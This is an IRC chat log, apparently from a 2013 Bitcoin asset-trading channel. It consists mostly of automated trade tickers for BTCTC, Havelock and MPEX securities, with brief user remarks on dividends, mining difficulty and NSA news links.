[DMS.SELLING] 42 @ 0.01818 = 0.7636 BTC [+] Aug 14 19:39:35 [BTCTC] [DMS.SELLING] 8 @ 0.01818 = 0.1454 BTC [+] Aug 14 19:39:37 [BTCTC] [DMS.SELLING] 300 @ 0.01818 = 5.454 BTC [+] Aug 14 19:39:38 [BTCTC] [DMS.SELLING] 365 @ 0.0183 = 6.6795 BTC [+] Aug 14 19:39:39 [BTCTC] [DMS.SELLING] 75 @ 0.0185 = 1.3875 BTC [+] Aug 14 19:39:40 [BTCTC] [DMS.SELLING] 120 @ 0.01875 = 2.25 BTC [+] Aug 14 19:39:41 [BTCTC] [DMS.SELLING] 40 @ 0.0188 = 0.752 BTC [+] Aug 14 19:39:42 [BTCTC] [DMS.SELLING] 75 @ 0.01899 = 1.4243 BTC [+] Aug 14 19:39:43 [BTCTC] [DMS.SELLING] 250 @ 0.019 = 4.75 BTC [+] Aug 14 19:40:00 ;;calc 0.019 + 0.00289 Aug 14 19:40:00 0.02189 Aug 14 19:40:30 http://on.aol.com/video/clapper-leads-independent-probe-of-his-own-spy-program-517894606 Aug 14 19:40:33 Clapper Leads 'Independent' Probe of His Own Spy Program - AOL On Aug 14 19:40:48 [BTCTC] [DMS.SELLING] 223 @ 0.019 = 4.237 BTC [+] Aug 14 19:40:58 [BTCTC] [DMS.PURCHASE] 200 @ 0.02079 = 4.158 BTC [+] Aug 14 19:41:15 [BTCTC] [DMS.PURCHASE] 800 @ 0.02079 = 16.632 BTC [+] Aug 14 19:41:26 [BTCTC] [DMS.SELLING] 35 @ 0.01978 = 0.6923 BTC [+] Aug 14 19:41:50 http://www.theguardian.com/world/2013/aug/13/white-house-james-clapper-nsa-surveillance-review Aug 14 19:41:53 White House insists James Clapper will not lead NSA surveillance review | World news | theguardian. Aug 14 19:42:00 hm Aug 14 19:42:03 damn Aug 14 19:42:20 [BTCTC] [DMS.PURCHASE] 897 @ 0.02079 = 18.6486 BTC [+] Aug 14 19:42:36 [BTCTC] [DMS.PURCHASE] 66 @ 0.02079 = 1.3721 BTC [+] Aug 14 19:42:46 Did not see that one Aug 14 19:42:47 [HAVELOCK] [AM100] 93 @ 0.0389 = 3.6177 BTC [+] Aug 14 19:43:09 [BTCTC] [DMS.MINING] 5 @ 0.00289 = 0.0145 BTC [-] Aug 14 19:43:14 http://bitbet.us/bet/476/btc-network-difficulty-tops-52-million-by-end/ Aug 14 19:43:18 15:1 Aug 14 19:43:19 [HAVELOCK] [AM100] 86 @ 0.0391899 = 3.3703 BTC [+] Aug 14 19:43:20 BitBet - BTC network difficulty tops 52 million by end of August Aug 14 19:43:21 [BTCTC] [DMS.SELLING] 5 @ 0.019 = 0.095 BTC [-] Aug 14 19:43:22 [BTCTC] [DMS.PURCHASE] 5 @ 0.02079 = 0.104 BTC [+] Aug 14 19:43:30 [BTCTC] [DMS.PURCHASE] 300 @ 0.02079 = 6.237 BTC [+] Aug 14 19:43:41 [BTCTC] [LABCOIN] 2 @ 0.001599 = 0.0032 BTC [+] Aug 14 19:43:41 [BTCTC] [LABCOIN] 1 @ 0.001587 BTC [-] Aug 14 19:43:43 [BTCTC] [LABCOIN] 20 @ 0.001586 = 0.0317 BTC [-] Aug 14 19:43:44 [BTCTC] [LABCOIN] 5 @ 0.001583 = 0.0079 BTC [-] Aug 14 19:43:54 [BTCTC] [ASICMINER-PT] 1 @ 4.016 BTC [-] Aug 14 19:43:57 [BTCTC] [DMS.MINING] 92 @ 0.00289 = 0.2659 BTC [-] Aug 14 19:43:58 [MPEX] [S.MPOE] 2750 @ 0.00084231 = 2.3164 BTC [+] Aug 14 19:44:27 [HAVELOCK] [SDSTM] 1 @ 0.006 BTC [-] Aug 14 19:44:38 [HAVELOCK] [AM100] 31 @ 0.0391899 = 1.2149 BTC [+] Aug 14 19:45:07 [BTCTC] [DMS.PURCHASE] 400 @ 0.02079 = 8.316 BTC [+] Aug 14 19:45:22 [BTCTC] [DMS.MINING] 75 @ 0.002666 = 0.2 BTC [-] Aug 14 19:45:28 ;;calc 0.0026 + 0.019 Aug 14 19:45:28 0.0216 Aug 14 19:45:29 [BTCTC] [DMS.MINING] 665 @ 0.002666 = 1.7729 BTC [-] Aug 14 19:45:44 coinbase is at $103, nice Aug 14 19:45:45 [BTCTC] [DMS.MINING] 60 @ 0.00261 = 0.1566 BTC [-] Aug 14 19:45:47 [BTCTC] [DMS.MINING] 199 @ 0.00255 = 0.5075 BTC [-] Aug 14 19:45:49 [HAVELOCK] [XBOND] 6 @ 0.0010451 = 0.0063 BTC [+] Aug 14 19:46:18 [BTCTC] [DMS.MINING] 51 @ 0.00255 = 0.1301 BTC [-] Aug 14 19:46:31 [BTCTC] [DMS.MINING] 60 @ 0.00261 = 0.1566 BTC [+] Aug 14 19:46:34 [BTCTC] [DMS.SELLING] 400 @ 0.01898 = 7.592 BTC [-] Aug 14 19:46:46 [BTCTC] [DMS.MINING] 15 @ 0.002666 = 0.04 BTC [+] Aug 14 19:46:48 [BTCTC] [DMS.SELLING] 95 @ 0.01835 = 1.7433 BTC [-] Aug 14 19:46:50 [BTCTC] [DMS.PURCHASE] 95 @ 0.02079 = 1.9751 BTC [+] Aug 14 19:47:08 [HAVELOCK] [SDSTM] 3 @ 0.0056334 = 0.0169 BTC [-] Aug 14 19:47:10 [BTCTC] [DMS.SELLING] 15 @ 0.01835 = 0.2753 BTC [-] Aug 14 19:47:11 [BTCTC] [DMS.SELLING] 95 @ 0.01889 = 1.7946 BTC [+] Aug 14 19:47:21 .d Aug 14 19:47:21 50810339.04828 | Next Diff in 1872 blocks | Estimated Change: 7.7643% in 11d 23h 24m 23s Aug 14 19:47:22 [BTCTC] [ASICMINER-PT] 1 @ 4.014 BTC [-] Aug 14 19:47:52 http://trilema.com/wp-content/uploads/2009/07/mircea-popescu-gpl-3.jpg Aug 14 19:47:59 ;;calc 75 * .02 Aug 14 19:47:59 1.5 Aug 14 19:48:03 [HAVELOCK] [AM100] 1 @ 0.0391899 BTC [+] Aug 14 19:48:14 [BTCTC] [DMS.MINING] 80 @ 0.002646 = 0.2117 BTC [-] Aug 14 19:48:15 GPL pic? Aug 14 19:48:29 [BTCTC] [DMS.MINING] 749 @ 0.002511 = 1.8807 BTC [-] Aug 14 19:49:14 the observer Aug 14 19:49:30 http://trilema.com/wp-content/uploads/2009/07/mircea-popescu-gpl-2.jpg .. almost intimate relationship there Aug 14 19:49:39 [BTCTC] [DMS.MINING] 28 @ 0.0026 = 0.0728 BTC [+] Aug 14 19:49:48 [BTCTC] [DMS.PURCHASE] 200 @ 0.02079 = 4.158 BTC [+] Aug 14 19:49:49 [BTCTC] [ASICMINER-PT] 1 @ 4.002 BTC [-] Aug 14 19:50:30 [HAVELOCK] [XBOND] 450 @ 0.0010451 = 0.4703 BTC [+] Aug 14 19:50:33 [BTCTC] [DMS.MINING] 1 @ 0.0026 BTC [+] Aug 14 19:50:35 [BTCTC] [DMS.SELLING] 8 @ 0.01835 = 0.1468 BTC [-] Aug 14 19:51:07 [BTCTC] [DMS.PURCHASE] 20 @ 0.02079 = 0.4158 BTC [+] Aug 14 19:51:17 [HAVELOCK] [AM100] 5 @ 0.0391799 = 0.1959 BTC [-] Aug 14 19:51:27 [HAVELOCK] [AM100] 7 @ 0.0391799 = 0.2743 BTC [-] Aug 14 19:51:47 [BTCTC] [LTC-ATF.B2] 2 @ 0.01043 = 0.0209 BTC [+] Aug 14 19:52:13 [BTCTC] [DMS.SELLING] 60 @ 0.01834 = 1.1004 BTC [-] Aug 14 19:52:14 [BTCTC] [DMS.SELLING] 57 @ 0.01835 = 1.046 BTC [+] Aug 14 19:52:16 [BTCTC] [DMS.SELLING] 140 @ 0.01835 = 2.569 BTC [+] Aug 14 19:53:06 [BTCTC] [ASICMINER-PT] 4 @ 4.002 = 16.008 BTC [-] Aug 14 19:53:32 [BTCTC] [ASICMINER-PT] 20 @ 3.8 = 76 BTC [-] Aug 14 19:53:50 [HAVELOCK] [HIM] 24 @ 0.1989 = 4.7736 BTC [+] Aug 14 19:53:52 [HAVELOCK] [HIM] 1 @ 0.19999999 BTC [+] Aug 14 19:53:54 [HAVELOCK] [HIM] 5 @ 0.2 = 1 BTC [+] Aug 14 19:53:56 [HAVELOCK] [HIM] 1 @ 0.2 BTC [+] Aug 14 19:54:04 AM 0.02097289 Aug 14 19:54:06 [BTCTC] [ASICMINER-PT] 6 @ 4.002 = 24.012 BTC [+] Aug 14 19:54:08 [BTCTC] [ASICMINER-PT] 8 @ 4.001 = 32.008 BTC [-] Aug 14 19:54:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.04099 BTC [+] Aug 14 19:54:34 [BTCTC] [BMF] 2 @ 0.03 = 0.06 BTC [-] Aug 14 19:54:36 [BTCTC] [BMF] 5 @ 0.03 = 0.15 BTC [-] Aug 14 19:55:17 [BTCTC] [ASICMINER-PT] 2 @ 4.001 = 8.002 BTC [-] Aug 14 19:55:19 [BTCTC] [ASICMINER-PT] 2 @ 4 = 8 BTC [-] Aug 14 19:55:48 [HAVELOCK] [VTX] 2 @ 0.588 = 1.176 BTC [+] Aug 14 19:56:46 [BTCTC] [DMS.MINING] 3 @ 0.0026 = 0.0078 BTC [+] Aug 14 19:57:03 [BTCTC] [TAT.ASICMINER] 3 @ 0.04001 = 0.12 BTC [-] Aug 14 19:57:04 [BTCTC] [TAT.ASICMINER] 24 @ 0.04001 = 0.9602 BTC [-] Aug 14 19:58:29 [BTCTC] [ACTIVEMINING] 75 @ 0.005376 = 0.4032 BTC [-] Aug 14 19:59:10 [BTCTC] [DMS.MINING] 10 @ 0.0026 = 0.026 BTC [+] Aug 14 19:59:38 [BTCTC] [B.YABMC] 1 @ 0.00295 BTC [+] Aug 14 19:59:53 [BTCTC] [DMS.SELLING] 150 @ 0.0183 = 2.745 BTC [-] Aug 14 20:00:29 [BTCTC] [DMS.SELLING] 29 @ 0.0183 = 0.5307 BTC [-] Aug 14 20:02:26 [BTCTC] [LABCOIN] 2 @ 0.001569 = 0.0031 BTC [-] Aug 14 20:02:27 [BTCTC] [LABCOIN] 20 @ 0.001568 = 0.0314 BTC [-] Aug 14 20:02:57 [HAVELOCK] [AM100] 1 @ 0.0388 BTC [-] Aug 14 20:02:59 [HAVELOCK] [AM100] 4 @ 0.03761 = 0.1504 BTC [-] Aug 14 20:03:06 [BTCTC] [DMS.PURCHASE] 230 @ 0.02079 = 4.7817 BTC [+] Aug 14 20:03:19 [BTCTC] [DMS.SELLING] 8 @ 0.0183 = 0.1464 BTC [-] Aug 14 20:03:37 [BTCTC] [DMS.SELLING] 1 @ 0.0183 BTC [-] Aug 14 20:04:02 [BTCTC] [DMS.SELLING] 112 @ 0.0183 = 2.0496 BTC [-] Aug 14 20:04:25 ;;seen vbs Aug 14 20:04:25 vbs was last seen in #bitcoin-assets 1 week, 5 days, 13 hours, 30 minutes, and 41 seconds ago: ok Aug 14 20:06:06 [BTCTC] [DMS.SELLING] 2 @ 0.01835 = 0.0367 BTC [+] Aug 14 20:06:14 [BTCTC] [LABCOIN] 10 @ 0.001568 = 0.0157 BTC [-] Aug 14 20:06:54 [BTCTC] [DMS.PURCHASE] 1 @ 0.02079 BTC [+] Aug 14 20:07:03 [BTCTC] [LABCOIN] 1 @ 0.001567 BTC [-] Aug 14 20:08:01 [BTCTC] [DMS.MINING] 8 @ 0.002542 = 0.0203 BTC [-] Aug 14 20:08:02 [BTCTC] [DMS.MINING] 10 @ 0.002541 = 0.0254 BTC [-] Aug 14 20:08:04 [BTCTC] [DMS.MINING] 10 @ 0.00254 = 0.0254 BTC [-] Aug 14 20:08:04 [BTCTC] [DMS.MINING] 10 @ 0.002539 = 0.0254 BTC [-] Aug 14 20:08:05 [BTCTC] [DMS.MINING] 10 @ 0.002538 = 0.0254 BTC [-] Aug 14 20:08:07 [BTCTC] [DMS.MINING] 10 @ 0.002537 = 0.0254 BTC [-] Aug 14 20:08:08 [BTCTC] [DMS.MINING] 10 @ 0.002536 = 0.0254 BTC [-] Aug 14 20:08:09 [BTCTC] [DMS.MINING] 163 @ 0.002535 = 0.4132 BTC [-] Aug 14 20:08:18 [BTCTC] [ASICMINER-PT] 1 @ 3.99 BTC [-] Aug 14 20:08:43 [BTCTC] [DMS.MINING] 300 @ 0.002535 = 0.7605 BTC [-] Aug 14 20:08:53 [BTCTC] [DMS.PURCHASE] 100 @ 0.02079 = 2.079 BTC [+] Aug 14 20:09:14 [BTCTC] [DMS.MINING] 28 @ 0.0026 = 0.0728 BTC [+] Aug 14 20:09:15 [BTCTC] [DMS.MINING] 15 @ 0.0026 = 0.039 BTC [+] Aug 14 20:09:17 [BTCTC] [DMS.MINING] 20 @ 0.00265 = 0.053 BTC [+] Aug 14 20:09:18 [BTCTC] [DMS.MINING] 35 @ 0.002675 = 0.0936 BTC [+] Aug 14 20:09:18 [BTCTC] [DMS.MINING] 200 @ 0.002688 = 0.5376 BTC [+] Aug 14 20:11:16 [BTCTC] [DMS.PURCHASE] 170 @ 0.02079 = 3.5343 BTC [+] Aug 14 20:12:01 [BTCTC] [DMS.PURCHASE] 1 @ 0.02079 BTC [+] Aug 14 20:12:10 [HAVELOCK] [SMG] 10 @ 0.000219 = 0.0022 BTC [+] Aug 14 20:12:28 [HAVELOCK] [SMG] 115 @ 0.00021999 = 0.0253 BTC [+] Aug 14 20:13:19 [BTCTC] [DMS.PURCHASE] 1 @ 0.02079 BTC [+] Aug 14 20:13:30 [BTCTC] [DMS.PURCHASE] 18 @ 0.02079 = 0.3742 BTC [+] Aug 14 20:15:10 [BTCTC] [DMS.PURCHASE] 1 @ 0.02079 BTC [+] Aug 14 20:15:48 [BTCTC] [DMS.MINING] 170 @ 0.002542 = 0.4321 BTC [-] Aug 14 20:16:51 [BTCTC] [DMS.SELLING] 100 @ 0.01833 = 1.833 BTC [-] Aug 14 20:17:26 [BTCTC] [DMS.SELLING] 130 @ 0.01834 = 2.3842 BTC [+] Aug 14 20:17:26 [BTCTC] [DMS.PURCHASE] 54 @ 0.02079 = 1.1227 BTC [+] Aug 14 20:17:36 [BTCTC] [DMS.PURCHASE] 23 @ 0.02079 = 0.4782 BTC [+] Aug 14 20:17:37 [BTCTC] [DMS.SELLING] 276 @ 0.01834 = 5.0618 BTC [+] Aug 14 20:17:38 [BTCTC] [DMS.SELLING] 58 @ 0.01835 = 1.0643 BTC [+] Aug 14 20:17:40 [BTCTC] [DMS.SELLING] 402 @ 0.01847 = 7.4249 BTC [+] Aug 14 20:18:14 [BTCTC] [DMS.SELLING] 230 @ 0.01847 = 4.2481 BTC [+] Aug 14 20:18:27 [BTCTC] [DMS.PURCHASE] 200 @ 0.02079 = 4.158 BTC [+] Aug 14 20:18:50 [BTCTC] [DMS.SELLING] 66 @ 0.0192 = 1.2672 BTC [+] Aug 14 20:18:52 [BTCTC] [DMS.SELLING] 134 @ 0.0192 = 2.5728 BTC [+] Aug 14 20:19:03 [BTCTC] [DMS.SELLING] 20 @ 0.01847 = 0.3694 BTC [-] Aug 14 20:19:10 [BTCTC] [DMS.MINING] 121 @ 0.0026 = 0.3146 BTC [+] Aug 14 20:19:42 [BTCTC] [DMS.MINING] 981 @ 0.002699 = 2.6477 BTC [+] Aug 14 20:19:47 [BTCTC] [DMS.SELLING] 121 @ 0.01845 = 2.2325 BTC [-] Aug 14 20:20:18 [BTCTC] [DMS.PURCHASE] 220 @ 0.02079 = 4.5738 BTC [+] Aug 14 20:20:48 [BTCTC] [DMS.PURCHASE] 65 @ 0.02079 = 1.3514 BTC [+] Aug 14 20:21:05 [BTCTC] [DMS.SELLING] 173 @ 0.0191 = 3.3043 BTC [+] Aug 14 20:21:06 [BTCTC] [LABCOIN] 72 @ 0.001563 = 0.1125 BTC [-] Aug 14 20:21:10 [BTCTC] [DMS.SELLING] 166 @ 0.0192 = 3.1872 BTC [+] Aug 14 20:21:12 [BTCTC] [DMS.SELLING] 20 @ 0.0192 = 0.384 BTC [+] Aug 14 20:21:13 [BTCTC] [DMS.SELLING] 20 @ 0.01925 = 0.385 BTC [+] Aug 14 20:21:15 [BTCTC] [DMS.SELLING] 538 @ 0.01944 = 10.4587 BTC [+] Aug 14 20:21:25 AM div not too substantial Aug 14 20:21:29 smaller than last Aug 14 20:21:42 whats it at now Aug 14 20:21:44 [BTCTC] [DMS.MINING] 22 @ 0.0026 = 0.0572 BTC [-] Aug 14 20:22:04 [BTCTC] [DMS.SELLING] 2 @ 0.0188 = 0.0376 BTC [-] Aug 14 20:22:16 [BTCTC] [DMS.PURCHASE] 100 @ 0.02079 = 2.079 BTC [+] Aug 14 20:22:22 [BTCTC] [DMS.SELLING] 52 @ 0.0188 = 0.9776 BTC [-] Aug 14 20:22:27 [BTCTC] [DMS.PURCHASE] 150 @ 0.02079 = 3.1185 BTC [+] Aug 14 20:22:43 [BTCTC] [DMS.MINING] 37 @ 0.00278 = 0.1029 BTC [+] Aug 14 20:22:57 [BTCTC] [DMS.SELLING] 8 @ 0.01899 = 0.1519 BTC [+] Aug 14 20:23:14 I dont think this div has blade sales in it yet Aug 14 20:23:15 just under .02/share Aug 14 20:23:23 [BTCTC] [DMS.PURCHASE] 49 @ 0.02079 = 1.0187 BTC [+] Aug 14 20:23:24 [BTCTC] [DMS.MINING] 2 @ 0.00278 = 0.0056 BTC [+] Aug 14 20:23:33 0.02097289 Aug 14 20:23:36 per share Aug 14 20:23:45 yeah that should be on the next whopper im thinking Aug 14 20:25:27 [BTCTC] [DMS.MINING] 100 @ 0.002601 = 0.2601 BTC [-] Aug 14 20:25:29 [BTCTC] [DMS.MINING] 120 @ 0.0026 = 0.312 BTC [-] Aug 14 20:25:54 [BTCTC] [DMS.SELLING] 11 @ 0.01897 = 0.2087 BTC [-] Aug 14 20:25:54 [BTCTC] [DMS.MINING] 150 @ 0.0026 = 0.39 BTC [-] Aug 14 20:26:29 [BTCTC] [DMS.SELLING] 39 @ 0.01897 = 0.7398 BTC [-] Aug 14 20:26:30 [BTCTC] [DMS.MINING] 1 @ 0.0026 BTC [-] Aug 14 20:26:34 [BTCTC] [DMS.SELLING] 362 @ 0.01898 = 6.8708 BTC [+] Aug 14 20:26:35 [BTCTC] [ACTIVEMINING] 2 @ 0.005447 = 0.0109 BTC [+] Aug 14 20:26:36 [BTCTC] [DMS.SELLING] 1099 @ 0.01899 = 20.87 BTC [+] Aug 14 20:26:47 [BTCTC] [DMS.PURCHASE] 65 @ 0.02079 = 1.3514 BTC [+] Aug 14 20:27:23 [BTCTC] [DMS.PURCHASE] 925 @ 0.02079 = 19.2308 BTC [+] Aug 14 20:27:51 [BTCTC] [DMS.PURCHASE] 320 @ 0.02079 = 6.6528 BTC [+] Aug 14 20:28:41 [BTCTC] [DMS.MINING] 65 @ 0.0026 = 0.169 BTC [-] Aug 14 20:28:48 [BTCTC] [DMS.PURCHASE] 50 @ 0.02079 = 1.0395 BTC [+] Aug 14 20:28:54 [BTCTC] [PAJKA.BOND] 1 @ 0.015 BTC [+] Aug 14 20:28:55 [BTCTC] [ACTIVEMINING] 10 @ 0.005376 = 0.0538 BTC [-] Aug 14 20:29:17 [BTCTC] [DMS.PURCHASE] 320 @ 0.02079 = 6.6528 BTC [+] Aug 14 20:29:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.0409 BTC [+] Aug 14 20:29:50 [BTCTC] [DMS.PURCHASE] 60 @ 0.02079 = 1.2474 BTC [+] Aug 14 20:30:24 [BTCTC] [DMS.MINING] 521 @ 0.0026 = 1.3546 BTC [-] Aug 14 20:30:26 [BTCTC] [DMS.MINING] 98 @ 0.00255 = 0.2499 BTC [-] Aug 14 20:31:20 [BTCTC] [DMS.MINING] 2 @ 0.002744 = 0.0055 BTC [+] Aug 14 20:31:25 [BTCTC] [DMS.PURCHASE] 5 @ 0.02079 = 0.104 BTC [+] Aug 14 20:31:32 [BTCTC] [DMS.MINING] 320 @ 0.00255 = 0.816 BTC [-] Aug 14 20:31:52 [BTCTC] [DMS.PURCHASE] 1000 @ 0.02079 = 20.79 BTC [+] Aug 14 20:31:55 [BTCTC] [LABCOIN] 13 @ 0.001567 = 0.0204 BTC [+] Aug 14 20:31:58 [BTCTC] [LABCOIN] 87 @ 0.001568 = 0.1364 BTC [+] Aug 14 20:32:23 [BTCTC] [DMS.PURCHASE] 1 @ 0.02079 BTC [+] Aug 14 20:32:51 [BTCTC] [DMS.PURCHASE] 55 @ 0.02079 = 1.1435 BTC [+] Aug 14 20:32:52 [BTCTC] [TAT.ASICMINER] 7 @ 0.04 = 0.28 BTC [-] Aug 14 20:32:56 [BTCTC] [TAT.ASICMINER] 4 @ 0.0399 = 0.1596 BTC [-] Aug 14 20:32:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.03981 BTC [-] Aug 14 20:33:01 [BTCTC] [TAT.ASICMINER] 7 @ 0.0398 = 0.2786 BTC [-] Aug 14 20:33:47 [BTCTC] [DMS.PURCHASE] 36 @ 0.02079 = 0.7484 BTC [+] Aug 14 20:34:50 [BTCTC] [DMS.MINING] 55 @ 0.0026 = 0.143 BTC [+] Aug 14 20:36:14 [BTCTC] [DMS.MINING] 925 @ 0.0026 = 2.405 BTC [+] Aug 14 20:36:14 [BTCTC] [DMS.SELLING] 25 @ 0.018 = 0.45 BTC [-] Aug 14 20:36:27 [BTCTC] [DMS.MINING] 19 @ 0.0026 = 0.0494 BTC [+] Aug 14 20:37:39 [BTCTC] [DMS.MINING] 20 @ 0.00255 = 0.051 BTC [-] Aug 14 20:37:48 [BTCTC] [DMS.SELLING] 50 @ 0.01791 = 0.8955 BTC [-] Aug 14 20:37:51 [BTCTC] [DMS.SELLING] 25 @ 0.01791 = 0.4478 BTC [-] Aug 14 20:38:28 [BTCTC] [DMS.SELLING] 84 @ 0.01791 = 1.5044 BTC [-] Aug 14 20:38:32 [BTCTC] [DMS.MINING] 129 @ 0.00255 = 0.329 BTC [-] Aug 14 20:39:19 [BTCTC] [BASIC-MINING] 1 @ 0.3219 BTC [-] Aug 14 20:39:43 [HAVELOCK] [AM100] 1 @ 0.03765 BTC [+] Aug 14 20:39:47 [BTCTC] [DMS.MINING] 33 @ 0.0026 = 0.0858 BTC [+] Aug 14 20:39:48 [BTCTC] [DMS.PURCHASE] 8 @ 0.02079 = 0.1663 BTC [+] Aug 14 20:40:31 [BTCTC] [BASIC-MINING] 1 @ 0.3218 BTC [-] Aug 14 20:41:52 [BTCTC] [BASIC-MINING] 1 @ 0.3219 BTC [+] Aug 14 20:42:29 [BTCTC] [DMS.PURCHASE] 1 @ 0.02079 BTC [+] Aug 14 20:42:39 [BTCTC] [BASIC-MINING] 1 @ 0.3219 BTC [+] Aug 14 20:43:53 [BTCTC] [BASIC-MINING] 1 @ 0.322 BTC [+] Aug 14 20:44:08 [BTCTC] [DMS.MINING] 67 @ 0.0026 = 0.1742 BTC [+] Aug 14 20:46:13 well, the Bitfury private pool doubled in hashes yesterday https://ghash.io/ fom 12th to 22th Aug 14 20:46:18 [BTCTC] [DMS.MINING] 8 @ 0.0026 = 0.0208 BTC [+] Aug 14 20:46:27 hm, an RSS feed for BitBet would be nice Aug 14 20:46:34 yet, I thought it did not work? Aug 14 20:48:06 [BTCTC] [DMS.PURCHASE] 1 @ 0.02079 BTC [+] Aug 14 20:49:15 [BTCTC] [DMS.PURCHASE] 1 @ 0.02079 BTC [+] Aug 14 20:49:19 [BTCTC] [DMS.MINING] 100 @ 0.00265 = 0.265 BTC [+] Aug 14 20:49:22 [BTCTC] [DMS.MINING] 100 @ 0.002675 = 0.2675 BTC [+] Aug 14 20:49:34 pankkake on the right side of the page? Aug 14 20:49:38 [MPEX] [S.MPOE] 1950 @ 0.00084391 = 1.6456 BTC [+] Aug 14 20:49:48 [BTCTC] [ASICMINER-PT] 1 @ 3.96 BTC [-] Aug 14 20:49:54 [BTCTC] [ASICMINER-PT] 3 @ 3.957 = 11.871 BTC [-] Aug 14 20:50:14 [HAVELOCK] [XBOND] 745 @ 0.0010451 = 0.7786 BTC [+] Aug 14 20:50:17 [BTCTC] [DMS.MINING] 300 @ 0.002745 = 0.8235 BTC [+] Aug 14 20:50:18 kakobrekla: oops. it's missing a link to in in the so my usual way of finding it didn't work Aug 14 20:50:40 [BTCTC] [LABCOIN] 1 @ 0.001567 BTC [-] Aug 14 20:50:41 [BTCTC] [DMS.MINING] 1 @ 0.0026 BTC [-] Aug 14 20:50:49 [BTCTC] [DMS.PURCHASE] 72 @ 0.02079 = 1.4969 BTC [+] Aug 14 20:50:50 [BTCTC] [B.YABMC] 10 @ 0.00295 = 0.0295 BTC [+] Aug 14 20:50:51 i guess so Aug 14 20:50:53 [HAVELOCK] [XBOND] 456 @ 0.0010453 = 0.4767 BTC [+] Aug 14 20:50:53 Aug 14 20:51:04 mhm Aug 14 20:51:26 [BTCTC] [B.YABMC] 10 @ 0.00295 = 0.0295 BTC [+] Aug 14 20:51:26 [BTCTC] [DMS.SELLING] 26 @ 0.0184 = 0.4784 BTC [+] Aug 14 20:51:33 [BTCTC] [DMS.SELLING] 74 @ 0.0184 = 1.3616 BTC [+] Aug 14 20:51:34 [BTCTC] [DMS.SELLING] 726 @ 0.01846 = 13.402 BTC [+] Aug 14 20:51:43 [BTCTC] [DMS.SELLING] 2 @ 0.0184 = 0.0368 BTC [-] Aug 14 20:52:41 [HAVELOCK] [XBOND] 741 @ 0.0010469 = 0.7758 BTC [+] Aug 14 20:53:03 [BTCTC] [DMS.SELLING] 200 @ 0.01836 = 3.672 BTC [-] Aug 14 20:53:06 [BTCTC] [DMS.SELLING] 58 @ 0.01838 = 1.066 BTC [+] Aug 14 20:53:08 [BTCTC] [DMS.SELLING] 199 @ 0.01846 = 3.6735 BTC [+] Aug 14 20:53:10 [BTCTC] [DMS.SELLING] 10 @ 0.01847 = 0.1847 BTC [+] Aug 14 20:53:15 [BTCTC] [DMS.MINING] 70 @ 0.0026 = 0.182 BTC [-] Aug 14 20:54:55 [HAVELOCK] [XBOND] 388 @ 0.0010469 = 0.4062 BTC [+] Aug 14 20:55:21 [BTCTC] [DMS.MINING] 8 @ 0.0026 = 0.0208 BTC [-] Aug 14 20:55:28 [BTCTC] [DMS.MINING] 6 @ 0.002774 = 0.0166 BTC [+] Aug 14 20:56:13 [BTCTC] [DMS.SELLING] 2 @ 0.01846 = 0.0369 BTC [-] Aug 14 20:57:43 [BTCTC] [ASICMINER-PT] 1 @ 3.97 BTC [+] Aug 14 20:58:24 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0009736 = 0.0019 BTC [-] Aug 14 20:58:32 [BTCTC] [ASICMINER-PT] 1 @ 4.031 BTC [+] Aug 14 20:59:05 thx ThickAsThieves Aug 14 20:59:17 [BTCTC] [ACTIVEMINING] 15 @ 0.005376 = 0.0806 BTC [-] Aug 14 20:59:18 [BTCTC] [ACTIVEMINING] 2 @ 0.005375 = 0.0108 BTC [-] Aug 14 20:59:20 [BTCTC] [ACTIVEMINING] 32 @ 0.005304 = 0.1697 BTC [-] Aug 14 20:59:21 [BTCTC] [ACTIVEMINING] 20 @ 0.005302 = 0.106 BTC [-] Aug 14 20:59:22 [BTCTC] [ACTIVEMINING] 56 @ 0.0053 = 0.2968 BTC [-] Aug 14 20:59:36 [BTCTC] [TAT.MINIGAME] 5 @ 0.000221 = 0.0011 BTC [-] Aug 14 21:00:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.03935 BTC [-] Aug 14 21:01:13 I find it wonderful that mpex dodged that bullet via user-unfriendly systems. it is definitely not low hanging fruit. cheers mircea_popescu Aug 14 21:01:36 also, romania Aug 14 21:01:40 :P Aug 14 21:01:59 [BTCTC] [DMS.SELLING] 3 @ 0.01842 = 0.0553 BTC [-] Aug 14 21:03:14 [BTCTC] [LABCOIN] 11 @ 0.001567 = 0.0172 BTC [-] Aug 14 21:03:40 did mircea_popescu not let them know he is one of the "most important people"? Aug 14 21:03:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.03934 BTC [-] Aug 14 21:03:45 [BTCTC] [DMS.PURCHASE] 934 @ 0.02079 = 19.4179 BTC [+] Aug 14 21:04:35 [BTCTC] [DMS.SELLING] 2 @ 0.01842 = 0.0368 BTC [-] Aug 14 21:05:29 [HAVELOCK] [XBOND] 23 @ 0.00104701 = 0.0241 BTC [+] Aug 14 21:07:17 [BTCTC] [TAT.ASICMINER] 5 @ 0.03934 = 0.1967 BTC [-] Aug 14 21:07:19 [BTCTC] [TAT.ASICMINER] 11 @ 0.03934 = 0.4327 BTC [-] Aug 14 21:07:28 [BTCTC] [ACTIVEMINING] 11 @ 0.005435 = 0.0598 BTC [+] Aug 14 21:08:29 [BTCTC] [ASICMINER-PT] 1 @ 4.001 BTC [-] Aug 14 21:08:30 [BTCTC] [ASICMINER-PT] 13 @ 4 = 52 BTC [-] Aug 14 21:09:35 [BTCTC] [DMS.MINING] 15 @ 0.002725 = 0.0409 BTC [-] Aug 14 21:10:38 [BTCTC] [TAT.MINIGAME] 95 @ 0.000221 = 0.021 BTC [-] Aug 14 21:10:39 [BTCTC] [TAT.MINIGAME] 1 @ 0.000221 BTC [-] Aug 14 21:11:02 deadweasel as always more to that story. Aug 14 21:11:18 [BTCTC] [TAT.MINIGAME] 25 @ 0.00022 = 0.0055 BTC [-] Aug 14 21:11:27 [BTCTC] [TAT.MINIGAME] 27 @ 0.00022 = 0.0059 BTC [-] Aug 14 21:12:07 [HAVELOCK] [VTX] 1 @ 0.6 BTC [+] Aug 14 21:12:10 [HAVELOCK] [VTX] 2 @ 0.6099 = 1.2198 BTC [+] Aug 14 21:12:20 [BTCTC] [DMS.PURCHASE] 250 @ 0.02079 = 5.1975 BTC [+] Aug 14 21:12:54 [BTCTC] [DMS.SELLING] 11 @ 0.018 = 0.198 BTC [-] Aug 14 21:12:56 